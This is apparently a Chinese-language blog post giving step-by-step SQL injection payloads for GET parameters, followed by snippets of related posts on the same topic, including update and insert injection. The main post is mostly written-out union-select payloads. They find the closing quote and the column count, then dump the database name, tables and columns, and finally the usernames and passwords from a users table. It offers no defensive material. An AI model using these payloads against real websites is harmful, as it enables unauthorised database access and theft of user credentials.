SQL注入的基本步驟

get型別

1.判斷是字元型還是數字型

2-1

2.通過報錯判斷閉合符

"』

『』 limit 0,1

3.確認查詢的字段數量

order by 3

4.確認佔位資訊

union select 1,2,3 --+

5.爆庫名

union select 1,2,database() --+

6.爆表名

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sql'--+

7.爆表字段

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sql' and table_name='users'--+

8.爆使用者名稱和密碼

union select 1,2,group_concat(concat_ws(',',username,password) separator '|') from users --+

歡迎關注我的部落格行雲部落格

SQL注入基本步驟

這篇文章將的比較好 sql注入基本步驟 1 注入點測試 2 查詢字段數 3 判斷回顯位 4 查詢資料庫的基本資訊 5 爆資料庫名 6 爆資料庫表名 7 爆欄位名現在來介紹幾個在滲透測試中常用的幾個函式和表庫名。hostname 主機名稱 datadir 返回資料庫的儲存目錄 version com...

SQL注入之常見注入的步驟

第一步抓包第二步判斷注入 id 1 and 1 1 正確 id 1 and1 2 報錯第三步判斷列數 id 1 order by 3 報錯 order by 2 正確依此可以判斷為2列第四步爆顯示位 id 1 union select 1,2 可以爆出1或哪個是顯示位第五步爆資料...

SQL注入之常見注入的步驟

update注入在修改資訊的時候，後台就是通過update去找操作的 insert注入 insert 注入是指我們前端註冊的資訊，後台就是通過 insert這個操作插入到資料庫中在註冊資訊處抓包 insert判斷注入單引號報錯存在注入，報錯資訊為 1234 1 1 1 1 基於報錯資訊進行注...

SQL注入的基本步驟

SQL注入基本步驟

SQL注入之常見注入的步驟

SQL注入之常見注入的步驟

相關推薦